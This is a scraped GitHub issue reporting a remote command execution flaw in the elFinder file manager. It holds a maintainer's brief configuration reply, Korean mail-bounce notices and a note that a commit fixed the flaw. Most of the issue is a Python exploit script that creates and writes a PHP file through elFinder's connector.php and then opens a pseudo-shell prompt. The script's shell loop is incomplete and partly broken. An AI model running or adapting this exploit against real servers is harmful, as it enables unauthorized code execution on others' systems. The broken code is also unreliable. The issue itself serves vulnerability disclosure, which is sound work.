Remote Command Execution #1018
Assignees
Comments
NAVER - http://www.naver.com/lovesin83@naver.com 님께 보내신 메일 <[elFinder] Remote Command Execution (#1018)> 이 다음과 같은 이유로 전송 실패했습니다. 받는 사람이 회원님의 메일을 수신차단 하였습니다. |
|
You can setup of "Mimetypes allowed to upload" with uploadAllow, uploadDeny and uploadOrder. add: oh, It's cmd |
NAVER - http://www.naver.com/lovesin83@naver.com 님께 보내신 메일 <Re: [elFinder] Remote Command Execution (#1018)> 이 다음과 같은 이유로 전송 실패했습니다. 받는 사람이 회원님의 메일을 수신차단 하였습니다. |
|
Fixed by 140a1aa |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hello elfinder suffers from a file creating by none-privileged user which can lead to rce.
I think adding a login panel or simply changing the chmod by the user manually will fix it.
Using this python the attacker can create a php file contaning phpinfo as an example.
import cookielib, urllib
import urllib2
print"\x20\x20+-------------------------------------------------+"
print"\x20\x20| elFinder Remote Command Execution Vulnerability |"
print"\x20\x20| TUNISIAN CYBER |"
print"\x20\x20+-------------------------------------------------+"
host = raw_input('\x20\x20Vulnerable Site:')
evilfile = raw_input('\x20\x20EvilFileName:')
path=raw_input('\x20\x20elFinder s Path:')
tcyber = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(tcyber))
create = opener.open('http://'+host+'/'+path+'/php/connector.php?cmd=mkfile&name='+evilfile+'&target=l1_Lw')
print create.read()
payload = urllib.urlencode({
'cmd' : 'put',
'target' : 'l1_'+evilfile.encode('base64','strict'),
'content' : ''
})
write = opener.open('http://'+host+'/'+path+'/php/connector.php', payload)
print write.read()
print '\n'
while True:
try:
cmd = raw_input('[She3LL]:~# ')
sys.exit()
The text was updated successfully, but these errors were encountered: